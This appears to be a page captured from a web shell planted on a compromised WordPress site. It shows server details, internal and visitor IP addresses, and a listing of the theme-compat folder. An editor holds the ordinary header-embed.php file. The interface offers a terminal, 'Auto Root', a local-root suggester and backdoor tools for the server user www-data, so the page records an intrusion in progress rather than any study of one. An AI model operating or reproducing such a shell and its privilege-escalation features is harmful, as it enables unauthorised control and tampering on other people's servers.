Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
wp-includes /
theme-compat /
Delete
Unzip
Name
Size
Permission
Date
Action
comments.php
2.1
KB
-rw-r--r--
2023-08-08 20:49
embed-404.php
967
B
-rw-r--r--
2022-05-24 20:50
embed-content.php
3.4
KB
-rw-r--r--
2022-03-04 08:12
embed.php
481
B
-rw-r--r--
2020-03-20 05:36
footer-embed.php
438
B
-rw-r--r--
2020-03-20 05:36
footer.php
1.03
KB
-rw-r--r--
2023-08-08 20:49
header-embed.php
702
B
-rw-r--r--
2021-12-06 16:06
header.php
1.82
KB
-rw-r--r--
2026-07-03 02:00
sidebar.php
4.38
KB
-rw-r--r--
2024-04-02 20:54
Save
Rename
<?php /** * Contains the post embed header template * * When a post is embedded in an iframe, this file is used to create the header output * if the active theme does not include a header-embed.php template. * * @package WordPress * @subpackage Theme_Compat * @since 4.5.0 */ if ( ! headers_sent() ) { header( 'X-WP-embed: true' ); } ?> <!DOCTYPE html> <html <?php language_attributes(); ?> class="no-js"> <head> <title><?php echo wp_get_document_title(); ?></title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <?php /** * Prints scripts or data in the embed template head tag. * * @since 4.4.0 */ do_action( 'embed_head' ); ?> </head> <body <?php body_class(); ?>>